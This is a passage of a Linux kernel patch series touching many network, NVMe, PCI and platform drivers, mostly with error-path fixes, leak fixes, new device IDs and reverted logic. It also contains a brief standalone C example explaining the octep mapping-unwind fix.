++void iavf_irq_enable_queues(struct iavf_adapter *adapter);
+ void iavf_free_all_tx_resources(struct iavf_adapter *adapter);
+ void iavf_free_all_rx_resources(struct iavf_adapter *adapter);
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 34711a88dbaa0..965d02d7ff80f 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -359,21 +359,18 @@ static void iavf_irq_disable(struct iavf_adapter *adapter)
+ }
+ 
+ /**
+- * iavf_irq_enable_queues - Enable interrupt for specified queues
++ * iavf_irq_enable_queues - Enable interrupt for all queues
+  * @adapter: board private structure
+- * @mask: bitmap of queues to enable
+  **/
+-void iavf_irq_enable_queues(struct iavf_adapter *adapter, u32 mask)
++void iavf_irq_enable_queues(struct iavf_adapter *adapter)
+ {
+ 	struct iavf_hw *hw = &adapter->hw;
+ 	int i;
+ 
+ 	for (i = 1; i < adapter->num_msix_vectors; i++) {
+-		if (mask & BIT(i - 1)) {
+-			wr32(hw, IAVF_VFINT_DYN_CTLN1(i - 1),
+-			     IAVF_VFINT_DYN_CTLN1_INTENA_MASK |
+-			     IAVF_VFINT_DYN_CTLN1_ITR_INDX_MASK);
+-		}
++		wr32(hw, IAVF_VFINT_DYN_CTLN1(i - 1),
++		     IAVF_VFINT_DYN_CTLN1_INTENA_MASK |
++		     IAVF_VFINT_DYN_CTLN1_ITR_INDX_MASK);
+ 	}
+ }
+ 
+@@ -387,7 +384,7 @@ void iavf_irq_enable(struct iavf_adapter *adapter, bool flush)
+ 	struct iavf_hw *hw = &adapter->hw;
+ 
+ 	iavf_misc_irq_enable(adapter);
+-	iavf_irq_enable_queues(adapter, ~0);
++	iavf_irq_enable_queues(adapter);
+ 
+ 	if (flush)
+ 		iavf_flush(hw);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_register.h b/drivers/net/ethernet/intel/iavf/iavf_register.h
+index bf793332fc9d5..a19e88898a0bb 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_register.h
++++ b/drivers/net/ethernet/intel/iavf/iavf_register.h
+@@ -40,7 +40,7 @@
+ #define IAVF_VFINT_DYN_CTL01_INTENA_MASK IAVF_MASK(0x1, IAVF_VFINT_DYN_CTL01_INTENA_SHIFT)
+ #define IAVF_VFINT_DYN_CTL01_ITR_INDX_SHIFT 3
+ #define IAVF_VFINT_DYN_CTL01_ITR_INDX_MASK IAVF_MASK(0x3, IAVF_VFINT_DYN_CTL01_ITR_INDX_SHIFT)
+-#define IAVF_VFINT_DYN_CTLN1(_INTVF) (0x00003800 + ((_INTVF) * 4)) /* _i=0...15 */ /* Reset: VFR */
++#define IAVF_VFINT_DYN_CTLN1(_INTVF) (0x00003800 + ((_INTVF) * 4)) /* _i=0...63 */ /* Reset: VFR */
+ #define IAVF_VFINT_DYN_CTLN1_INTENA_SHIFT 0
+ #define IAVF_VFINT_DYN_CTLN1_INTENA_MASK IAVF_MASK(0x1, IAVF_VFINT_DYN_CTLN1_INTENA_SHIFT)
+ #define IAVF_VFINT_DYN_CTLN1_SWINT_TRIG_SHIFT 2
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 6a50f8ba3940c..4095fe40dfc9b 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -6784,6 +6784,10 @@ int ice_down(struct ice_vsi *vsi)
+ 	ice_for_each_txq(vsi, i)
+ 		ice_clean_tx_ring(vsi->tx_rings[i]);
+ 
++	if (ice_is_xdp_ena_vsi(vsi))
++		ice_for_each_xdp_txq(vsi, i)
++			ice_clean_tx_ring(vsi->xdp_rings[i]);
++
+ 	ice_for_each_rxq(vsi, i)
+ 		ice_clean_rx_ring(vsi->rx_rings[i]);
+ 
+diff --git a/drivers/net/ethernet/intel/igb/igb_ethtool.c b/drivers/net/ethernet/intel/igb/igb_ethtool.c
+index ff911af16a4b5..96fa1c420f910 100644
+--- a/drivers/net/ethernet/intel/igb/igb_ethtool.c
++++ b/drivers/net/ethernet/intel/igb/igb_ethtool.c
+@@ -822,6 +822,8 @@ static int igb_set_eeprom(struct net_device *netdev,
+ 		 */
+ 		ret_val = hw->nvm.ops.read(hw, last_word, 1,
+ 				   &eeprom_buff[last_word - first_word]);
++		if (ret_val)
++			goto out;
+ 	}
+ 
+ 	/* Device's eeprom is always little-endian, word addressable */
+@@ -841,6 +843,7 @@ static int igb_set_eeprom(struct net_device *netdev,
+ 		hw->nvm.ops.update(hw);
+ 
+ 	igb_set_fw_version(adapter);
++out:
+ 	kfree(eeprom_buff);
+ 	return ret_val;
+ }
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index b3aed4e2ca91c..18ffbc892f86c 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -6893,6 +6893,7 @@ static void igb_extts(struct igb_adapter *adapter, int tsintr_tt)
+ 	struct e1000_hw *hw = &adapter->hw;
+ 	struct ptp_clock_event event;
+ 	struct timespec64 ts;
++	unsigned long flags;
+ 
+ 	if (pin < 0 || pin >= IGB_N_SDP)
+ 		return;
+@@ -6900,9 +6901,12 @@ static void igb_extts(struct igb_adapter *adapter, int tsintr_tt)
+ 	if (hw->mac.type == e1000_82580 ||
+ 	    hw->mac.type == e1000_i354 ||
+ 	    hw->mac.type == e1000_i350) {
+-		s64 ns = rd32(auxstmpl);
++		u64 ns = rd32(auxstmpl);
+ 
+-		ns += ((s64)(rd32(auxstmph) & 0xFF)) << 32;
++		ns += ((u64)(rd32(auxstmph) & 0xFF)) << 32;
++		spin_lock_irqsave(&adapter->tmreg_lock, flags);
++		ns = timecounter_cyc2time(&adapter->tc, ns);
++		spin_unlock_irqrestore(&adapter->tmreg_lock, flags);
+ 		ts = ns_to_timespec64(ns);
+ 	} else {
+ 		ts.tv_nsec = rd32(auxstmpl);
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 1d9b70e0ff67f..3509974c1f8e4 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -255,6 +255,13 @@ static void igc_clean_tx_ring(struct igc_ring *tx_ring)
+ 	/* reset BQL for queue */
+ 	netdev_tx_reset_queue(txring_txq(tx_ring));
+ 
++	/* Zero out the buffer ring */
++	memset(tx_ring->tx_buffer_info, 0,
++	       sizeof(*tx_ring->tx_buffer_info) * tx_ring->count);
++
++	/* Zero out the descriptor ring */
++	memset(tx_ring->desc, 0, tx_ring->size);
++
+ 	/* reset next_to_use and next_to_clean */
+ 	tx_ring->next_to_use = 0;
+ 	tx_ring->next_to_clean = 0;
+@@ -268,7 +275,7 @@ static void igc_clean_tx_ring(struct igc_ring *tx_ring)
+  */
+ void igc_free_tx_resources(struct igc_ring *tx_ring)
+ {
+-	igc_clean_tx_ring(tx_ring);
++	igc_disable_tx_ring(tx_ring);
+ 
+ 	vfree(tx_ring->tx_buffer_info);
+ 	tx_ring->tx_buffer_info = NULL;
+@@ -6678,6 +6685,9 @@ static void igc_remove(struct pci_dev *pdev)
+ 
+ 	igc_ptp_stop(adapter);
+ 
++	pci_disable_ptm(pdev);
++	pci_clear_master(pdev);
++
+ 	set_bit(__IGC_DOWN, &adapter->state);
+ 
+ 	del_timer_sync(&adapter->watchdog_timer);
+diff --git a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+index b45dd7f04e213..8979dd05e873f 100644
+--- a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
++++ b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+@@ -928,6 +928,9 @@ int octep_device_setup(struct octep_device *oct)
+ 		oct->mmio[i].hw_addr =
+ 			ioremap(pci_resource_start(oct->pdev, i * 2),
+ 				pci_resource_len(oct->pdev, i * 2));
++		if (!oct->mmio[i].hw_addr)
++			goto unmap_prev;
++
+ 		oct->mmio[i].mapped = 1;
+ 	}
+ 
+@@ -966,7 +969,9 @@ int octep_device_setup(struct octep_device *oct)
+ 	return 0;
+ 
+ unsupported_dev:
+-	for (i = 0; i < OCTEP_MMIO_REGIONS; i++)
++	i = OCTEP_MMIO_REGIONS;
++unmap_prev:
++	while (i--)
+ 		iounmap(oct->mmio[i].hw_addr);
+ 
+ 	kfree(oct->conf);
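
The octep fix above unwinds a mid-loop ioremap() failure by walking back over
only the regions mapped so far; the unsupported-device path reuses the same
loop by entering it with i set to the full count. A standalone sketch of that
partial-initialization unwind (failure point illustrative):

#include <stdio.h>

#define NR_REGIONS 4

static int mapped[NR_REGIONS];

static int map_region(int i)
{
	if (i == 2)
		return -1;	/* simulate ioremap() failure */
	mapped[i] = 1;
	return 0;
}

static void unmap_region(int i)
{
	mapped[i] = 0;
	printf("unmapped region %d\n", i);
}

static int setup(void)
{
	int i;

	for (i = 0; i < NR_REGIONS; i++)
		if (map_region(i))
			goto unmap_prev;
	return 0;

unmap_prev:
	while (i--)		/* undo regions [0, i) in reverse */
		unmap_region(i);
	return -1;
}

int main(void)
{
	printf("setup=%d\n", setup());
	return 0;
}
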
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 84f2ba53b8b68..8cb2a0181fb9b 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -1878,7 +1878,8 @@ static int nix_check_txschq_alloc_req(struct rvu *rvu, int lvl, u16 pcifunc,
+ 		free_cnt = rvu_rsrc_free_count(&txsch->schq);
+ 	}
+ 
+-	if (free_cnt < req_schq || req_schq > MAX_TXSCHQ_PER_FUNC)
++	if (free_cnt < req_schq || req->schq[lvl] > MAX_TXSCHQ_PER_FUNC ||
++	    req->schq_contig[lvl] > MAX_TXSCHQ_PER_FUNC)
+ 		return NIX_AF_ERR_TLX_ALLOC_FAIL;
+ 
+ 	/* If contiguous queues are needed, check for availability */
+@@ -4069,10 +4070,6 @@ int rvu_mbox_handler_nix_set_rx_cfg(struct rvu *rvu, struct nix_rx_cfg *req,
+ 
+ static u64 rvu_get_lbk_link_credits(struct rvu *rvu, u16 lbk_max_frs)
+ {
+-	/* CN10k supports 72KB FIFO size and max packet size of 64k */
+-	if (rvu->hw->lbk_bufsize == 0x12000)
+-		return (rvu->hw->lbk_bufsize - lbk_max_frs) / 16;
+-
+ 	return 1600; /* 16 * max LBK datarate = 16 * 100Gbps */
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+index 3182adb7b9a80..3b48b635977f6 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+@@ -1168,10 +1168,8 @@ static u16 __rvu_npc_exact_cmd_rules_cnt_update(struct rvu *rvu, int drop_mcam_i
+ {
+ 	struct npc_exact_table *table;
+ 	u16 *cnt, old_cnt;
+-	bool promisc;
+ 
+ 	table = rvu->hw->table;
+-	promisc = table->promisc_mode[drop_mcam_idx];
+ 
+ 	cnt = &table->cnt_cmd_rules[drop_mcam_idx];
+ 	old_cnt = *cnt;
+@@ -1183,16 +1181,13 @@ static u16 __rvu_npc_exact_cmd_rules_cnt_update(struct rvu *rvu, int drop_mcam_i
+ 
+ 	*enable_or_disable_cam = false;
+ 
+-	if (promisc)
+-		goto done;
+-
+-	/* If all rules are deleted and not already in promisc mode; disable cam */
++	/* If all rules are deleted, disable cam */
+ 	if (!*cnt && val < 0) {
+ 		*enable_or_disable_cam = true;
+ 		goto done;
+ 	}
+ 
+-	/* If rule got added and not already in promisc mode; enable cam */
++	/* If rule got added, enable cam */
+ 	if (!old_cnt && val > 0) {
+ 		*enable_or_disable_cam = true;
+ 		goto done;
+@@ -1447,7 +1442,6 @@ int rvu_npc_exact_promisc_disable(struct rvu *rvu, u16 pcifunc)
+ 	u32 drop_mcam_idx;
+ 	bool *promisc;
+ 	bool rc;
+-	u32 cnt;
+ 
+ 	table = rvu->hw->table;
+ 
+@@ -1470,17 +1464,8 @@ int rvu_npc_exact_promisc_disable(struct rvu *rvu, u16 pcifunc)
+ 		return LMAC_AF_ERR_INVALID_PARAM;
+ 	}
+ 	*promisc = false;
+-	cnt = __rvu_npc_exact_cmd_rules_cnt_update(rvu, drop_mcam_idx, 0, NULL);
+ 	mutex_unlock(&table->lock);
+ 
+-	/* If no dmac filter entries configured, disable drop rule */
+-	if (!cnt)
+-		rvu_npc_enable_mcam_by_entry_index(rvu, drop_mcam_idx, NIX_INTF_RX, false);
+-	else
+-		rvu_npc_enable_mcam_by_entry_index(rvu, drop_mcam_idx, NIX_INTF_RX, !*promisc);
+-
+-	dev_dbg(rvu->dev, "%s: disabled  promisc mode (cgx=%d lmac=%d, cnt=%d)\n",
+-		__func__, cgx_id, lmac_id, cnt);
+ 	return 0;
+ }
+ 
+@@ -1498,7 +1483,6 @@ int rvu_npc_exact_promisc_enable(struct rvu *rvu, u16 pcifunc)
+ 	u32 drop_mcam_idx;
+ 	bool *promisc;
+ 	bool rc;
+-	u32 cnt;
+ 
+ 	table = rvu->hw->table;
+ 
+@@ -1521,17 +1505,8 @@ int rvu_npc_exact_promisc_enable(struct rvu *rvu, u16 pcifunc)
+ 		return LMAC_AF_ERR_INVALID_PARAM;
+ 	}
+ 	*promisc = true;
+-	cnt = __rvu_npc_exact_cmd_rules_cnt_update(rvu, drop_mcam_idx, 0, NULL);
+ 	mutex_unlock(&table->lock);
+ 
+-	/* If no dmac filter entries configured, disable drop rule */
+-	if (!cnt)
+-		rvu_npc_enable_mcam_by_entry_index(rvu, drop_mcam_idx, NIX_INTF_RX, false);
+-	else
+-		rvu_npc_enable_mcam_by_entry_index(rvu, drop_mcam_idx, NIX_INTF_RX, !*promisc);
+-
+-	dev_dbg(rvu->dev, "%s: Enabled promisc mode (cgx=%d lmac=%d cnt=%d)\n",
+-		__func__, cgx_id, lmac_id, cnt);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
+index 1a35b3c2a3674..0b560e97a3563 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
+@@ -275,18 +275,6 @@ static inline bool mlx5_sriov_is_enabled(struct mlx5_core_dev *dev)
+ 	return pci_num_vf(dev->pdev) ? true : false;
+ }
+ 
+-static inline int mlx5_lag_is_lacp_owner(struct mlx5_core_dev *dev)
+-{
+-	/* LACP owner conditions:
+-	 * 1) Function is physical.
+-	 * 2) LAG is supported by FW.
+-	 * 3) LAG is managed by driver (currently the only option).
+-	 */
+-	return  MLX5_CAP_GEN(dev, vport_group_manager) &&
+-		   (MLX5_CAP_GEN(dev, num_lag_ports) > 1) &&
+-		    MLX5_CAP_GEN(dev, lag_master);
+-}
+-
+ int mlx5_rescan_drivers_locked(struct mlx5_core_dev *dev);
+ static inline int mlx5_rescan_drivers(struct mlx5_core_dev *dev)
+ {
+diff --git a/drivers/net/ethernet/sfc/efx_channels.c b/drivers/net/ethernet/sfc/efx_channels.c
+index aaa381743bca3..27d00ffac68f4 100644
+--- a/drivers/net/ethernet/sfc/efx_channels.c
++++ b/drivers/net/ethernet/sfc/efx_channels.c
+@@ -301,6 +301,7 @@ int efx_probe_interrupts(struct efx_nic *efx)
+ 		efx->tx_channel_offset = 0;
+ 		efx->n_xdp_channels = 0;
+ 		efx->xdp_channel_offset = efx->n_channels;
++		efx->xdp_txq_queues_mode = EFX_XDP_TX_QUEUES_BORROWED;
+ 		rc = pci_enable_msi(efx->pci_dev);
+ 		if (rc == 0) {
+ 			efx_get_channel(efx, 0)->irq = efx->pci_dev->irq;
+@@ -322,6 +323,7 @@ int efx_probe_interrupts(struct efx_nic *efx)
+ 		efx->tx_channel_offset = efx_separate_tx_channels ? 1 : 0;
+ 		efx->n_xdp_channels = 0;
+ 		efx->xdp_channel_offset = efx->n_channels;
++		efx->xdp_txq_queues_mode = EFX_XDP_TX_QUEUES_BORROWED;
+ 		efx->legacy_irq = efx->pci_dev->irq;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/sfc/siena/efx_channels.c b/drivers/net/ethernet/sfc/siena/efx_channels.c
+index 06ed74994e366..1776f7f8a7a90 100644
+--- a/drivers/net/ethernet/sfc/siena/efx_channels.c
++++ b/drivers/net/ethernet/sfc/siena/efx_channels.c
+@@ -302,6 +302,7 @@ int efx_siena_probe_interrupts(struct efx_nic *efx)
+ 		efx->tx_channel_offset = 0;
+ 		efx->n_xdp_channels = 0;
+ 		efx->xdp_channel_offset = efx->n_channels;
++		efx->xdp_txq_queues_mode = EFX_XDP_TX_QUEUES_BORROWED;
+ 		rc = pci_enable_msi(efx->pci_dev);
+ 		if (rc == 0) {
+ 			efx_get_channel(efx, 0)->irq = efx->pci_dev->irq;
+@@ -323,6 +324,7 @@ int efx_siena_probe_interrupts(struct efx_nic *efx)
+ 		efx->tx_channel_offset = efx_siena_separate_tx_channels ? 1 : 0;
+ 		efx->n_xdp_channels = 0;
+ 		efx->xdp_channel_offset = efx->n_channels;
++		efx->xdp_txq_queues_mode = EFX_XDP_TX_QUEUES_BORROWED;
+ 		efx->legacy_irq = efx->pci_dev->irq;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 4903157230621..30ce073055785 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -3865,7 +3865,6 @@ irq_error:
+ 
+ 	stmmac_hw_teardown(dev);
+ init_error:
+-	free_dma_desc_resources(priv, &priv->dma_conf);
+ 	phylink_disconnect_phy(priv->phylink);
+ init_phy_error:
+ 	pm_runtime_put(priv->device);
+@@ -3883,6 +3882,9 @@ static int stmmac_open(struct net_device *dev)
+ 		return PTR_ERR(dma_conf);
+ 
+ 	ret = __stmmac_open(dev, dma_conf);
++	if (ret)
++		free_dma_desc_resources(priv, dma_conf);
++
+ 	kfree(dma_conf);
+ 	return ret;
+ }
+@@ -5607,12 +5609,15 @@ static int stmmac_change_mtu(struct net_device *dev, int new_mtu)
+ 		stmmac_release(dev);
+ 
+ 		ret = __stmmac_open(dev, dma_conf);
+-		kfree(dma_conf);
+ 		if (ret) {
++			free_dma_desc_resources(priv, dma_conf);
++			kfree(dma_conf);
+ 			netdev_err(priv->dev, "failed reopening the interface after MTU change\n");
+ 			return ret;
+ 		}
+ 
++		kfree(dma_conf);
++
+ 		stmmac_set_rx_mode(dev);
+ 	}
+ 
+diff --git a/drivers/net/ipvlan/ipvlan_l3s.c b/drivers/net/ipvlan/ipvlan_l3s.c
+index 71712ea25403d..d5b05e8032199 100644
+--- a/drivers/net/ipvlan/ipvlan_l3s.c
++++ b/drivers/net/ipvlan/ipvlan_l3s.c
+@@ -102,6 +102,10 @@ static unsigned int ipvlan_nf_input(void *priv, struct sk_buff *skb,
+ 
+ 	skb->dev = addr->master->dev;
+ 	skb->skb_iif = skb->dev->ifindex;
++#if IS_ENABLED(CONFIG_IPV6)
++	if (addr->atype == IPVL_IPV6)
++		IP6CB(skb)->iif = skb->dev->ifindex;
++#endif
+ 	len = skb->len + ETH_HLEN;
+ 	ipvlan_count_rx(addr->master, len, true, false);
+ out:
+diff --git a/drivers/net/macsec.c b/drivers/net/macsec.c
+index 038a787943927..983cabf9a0f67 100644
+--- a/drivers/net/macsec.c
++++ b/drivers/net/macsec.c
+@@ -3981,17 +3981,15 @@ static int macsec_add_dev(struct net_device *dev, sci_t sci, u8 icv_len)
+ 		return -ENOMEM;
+ 
+ 	secy->tx_sc.stats = netdev_alloc_pcpu_stats(struct pcpu_tx_sc_stats);
+-	if (!secy->tx_sc.stats) {
+-		free_percpu(macsec->stats);
++	if (!secy->tx_sc.stats)
+ 		return -ENOMEM;
+-	}
+ 
+ 	secy->tx_sc.md_dst = metadata_dst_alloc(0, METADATA_MACSEC, GFP_KERNEL);
+-	if (!secy->tx_sc.md_dst) {
+-		free_percpu(secy->tx_sc.stats);
+-		free_percpu(macsec->stats);
++	if (!secy->tx_sc.md_dst)
++		/* macsec and secy percpu stats will be freed when unregistering
++		 * net_device in macsec_free_netdev()
++		 */
+ 		return -ENOMEM;
+-	}
+ 
+ 	if (sci == MACSEC_UNDEF_SCI)
+ 		sci = dev_to_sci(dev, MACSEC_PORT_ES);
+diff --git a/drivers/net/phy/phylink.c b/drivers/net/phy/phylink.c
+index 4073e8243df3f..5b064a1de92f0 100644
+--- a/drivers/net/phy/phylink.c
++++ b/drivers/net/phy/phylink.c
+@@ -188,6 +188,7 @@ static int phylink_interface_max_speed(phy_interface_t interface)
+ 	case PHY_INTERFACE_MODE_RGMII_ID:
+ 	case PHY_INTERFACE_MODE_RGMII:
+ 	case PHY_INTERFACE_MODE_QSGMII:
++	case PHY_INTERFACE_MODE_QUSGMII:
+ 	case PHY_INTERFACE_MODE_SGMII:
+ 	case PHY_INTERFACE_MODE_GMII:
+ 		return SPEED_1000;
+@@ -204,7 +205,6 @@ static int phylink_interface_max_speed(phy_interface_t interface)
+ 	case PHY_INTERFACE_MODE_10GBASER:
+ 	case PHY_INTERFACE_MODE_10GKR:
+ 	case PHY_INTERFACE_MODE_USXGMII:
+-	case PHY_INTERFACE_MODE_QUSGMII:
+ 		return SPEED_10000;
+ 
+ 	case PHY_INTERFACE_MODE_25GBASER:
+@@ -3263,6 +3263,41 @@ void phylink_decode_usxgmii_word(struct phylink_link_state *state,
+ }
+ EXPORT_SYMBOL_GPL(phylink_decode_usxgmii_word);
+ 
++/**
++ * phylink_decode_usgmii_word() - decode the USGMII word from a MAC PCS
++ * @state: a pointer to a struct phylink_link_state.
++ * @lpa: a 16 bit value which stores the USGMII auto-negotiation word
++ *
++ * Helper for MAC PCS supporting the USGMII protocol and the auto-negotiation
++ * code word.  Decode the USGMII code word and populate the corresponding fields
++ * (speed, duplex) into the phylink_link_state structure. The structure for this
++ * word is the same as the USXGMII word, except it only supports speeds up to
++ * 1Gbps.
++ */
++static void phylink_decode_usgmii_word(struct phylink_link_state *state,
++				       uint16_t lpa)
++{
++	switch (lpa & MDIO_USXGMII_SPD_MASK) {
++	case MDIO_USXGMII_10:
++		state->speed = SPEED_10;
++		break;
++	case MDIO_USXGMII_100:
++		state->speed = SPEED_100;
++		break;
++	case MDIO_USXGMII_1000:
++		state->speed = SPEED_1000;
++		break;
++	default:
++		state->link = false;
++		return;
++	}
++
++	if (lpa & MDIO_USXGMII_FULL_DUPLEX)
++		state->duplex = DUPLEX_FULL;
++	else
++		state->duplex = DUPLEX_HALF;
++}
++
+ /**
+  * phylink_mii_c22_pcs_decode_state() - Decode MAC PCS state from MII registers
+  * @state: a pointer to a &struct phylink_link_state.
+@@ -3299,9 +3334,11 @@ void phylink_mii_c22_pcs_decode_state(struct phylink_link_state *state,
+ 
+ 	case PHY_INTERFACE_MODE_SGMII:
+ 	case PHY_INTERFACE_MODE_QSGMII:
+-	case PHY_INTERFACE_MODE_QUSGMII:
+ 		phylink_decode_sgmii_word(state, lpa);
+ 		break;
++	case PHY_INTERFACE_MODE_QUSGMII:
++		phylink_decode_usgmii_word(state, lpa);
++		break;
+ 
+ 	default:
+ 		state->link = false;
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 45c2585011351..68829a5a93d3e 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1219,7 +1219,9 @@ static const struct usb_device_id products[] = {
+ 	{QMI_FIXED_INTF(0x05c6, 0x9080, 8)},
+ 	{QMI_FIXED_INTF(0x05c6, 0x9083, 3)},
+ 	{QMI_FIXED_INTF(0x05c6, 0x9084, 4)},
++	{QMI_QUIRK_SET_DTR(0x05c6, 0x9091, 2)},	/* Compal RXM-G1 */
+ 	{QMI_FIXED_INTF(0x05c6, 0x90b2, 3)},    /* ublox R410M */
++	{QMI_QUIRK_SET_DTR(0x05c6, 0x90db, 2)},	/* Compal RXM-G1 */
+ 	{QMI_FIXED_INTF(0x05c6, 0x920d, 0)},
+ 	{QMI_FIXED_INTF(0x05c6, 0x920d, 5)},
+ 	{QMI_QUIRK_SET_DTR(0x05c6, 0x9625, 4)},	/* YUGA CLM920-NC5 */
+diff --git a/drivers/net/wan/lapbether.c b/drivers/net/wan/lapbether.c
+index d62a904d2e422..56326f38fe8a3 100644
+--- a/drivers/net/wan/lapbether.c
++++ b/drivers/net/wan/lapbether.c
+@@ -384,6 +384,9 @@ static int lapbeth_new_device(struct net_device *dev)
+ 
+ 	ASSERT_RTNL();
+ 
++	if (dev->type != ARPHRD_ETHER)
++		return -EINVAL;
++
+ 	ndev = alloc_netdev(sizeof(*lapbeth), "lapb%d", NET_NAME_UNKNOWN,
+ 			    lapbeth_setup);
+ 	if (!ndev)
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index ba4903c86f7ff..145fa7ef3f740 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3537,6 +3537,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1e4B, 0x1202),   /* MAXIO MAP1202 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
++	{ PCI_DEVICE(0x1e4B, 0x1602),   /* MAXIO MAP1602 */
++		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1cc1, 0x5350),   /* ADATA XPG GAMMIX S50 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1dbe, 0x5236),   /* ADATA XPG GAMMIX S70 */
+diff --git a/drivers/of/overlay.c b/drivers/of/overlay.c
+index ed4e6c144a681..5289975bad708 100644
+--- a/drivers/of/overlay.c
++++ b/drivers/of/overlay.c
+@@ -811,6 +811,7 @@ static int init_overlay_changeset(struct overlay_changeset *ovcs)
+ 		if (!fragment->target) {
+ 			pr_err("symbols in overlay, but not in live tree\n");
+ 			ret = -EINVAL;
++			of_node_put(node);
+ 			goto err_out;
+ 		}
+ 
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 8d32a3834688f..ccc90656130a0 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -5995,8 +5995,9 @@ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x56c1, aspm_l1_acceptable_latency
+ 
+ #ifdef CONFIG_PCIE_DPC
+ /*
+- * Intel Tiger Lake and Alder Lake BIOS has a bug that clears the DPC
+- * RP PIO Log Size of the integrated Thunderbolt PCIe Root Ports.
++ * Intel Ice Lake, Tiger Lake and Alder Lake BIOS has a bug that clears
++ * the DPC RP PIO Log Size of the integrated Thunderbolt PCIe Root
++ * Ports.
+  */
+ static void dpc_log_size(struct pci_dev *dev)
+ {
+@@ -6019,6 +6020,10 @@ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x461f, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x462f, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x463f, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x466e, dpc_log_size);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x8a1d, dpc_log_size);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x8a1f, dpc_log_size);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x8a21, dpc_log_size);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x8a23, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a23, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a25, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a27, dpc_log_size);
+diff --git a/drivers/platform/x86/asus-nb-wmi.c b/drivers/platform/x86/asus-nb-wmi.c
+index e2c9a68d12df9..fdf7da06af306 100644
+--- a/drivers/platform/x86/asus-nb-wmi.c
++++ b/drivers/platform/x86/asus-nb-wmi.c
+@@ -555,6 +555,7 @@ static const struct key_entry asus_nb_wmi_keymap[] = {
+ 	{ KE_KEY, 0x71, { KEY_F13 } }, /* General-purpose button */
+ 	{ KE_IGNORE, 0x79, },  /* Charger type detection notification */

+ 	{ KE_KEY, 0x7a, { KEY_ALS_TOGGLE } }, /* Ambient Light Sensor Toggle */
++	{ KE_IGNORE, 0x7B, }, /* Charger connect/disconnect notification */
+ 	{ KE_KEY, 0x7c, { KEY_MICMUTE } },
+ 	{ KE_KEY, 0x7D, { KEY_BLUETOOTH } }, /* Bluetooth Enable */
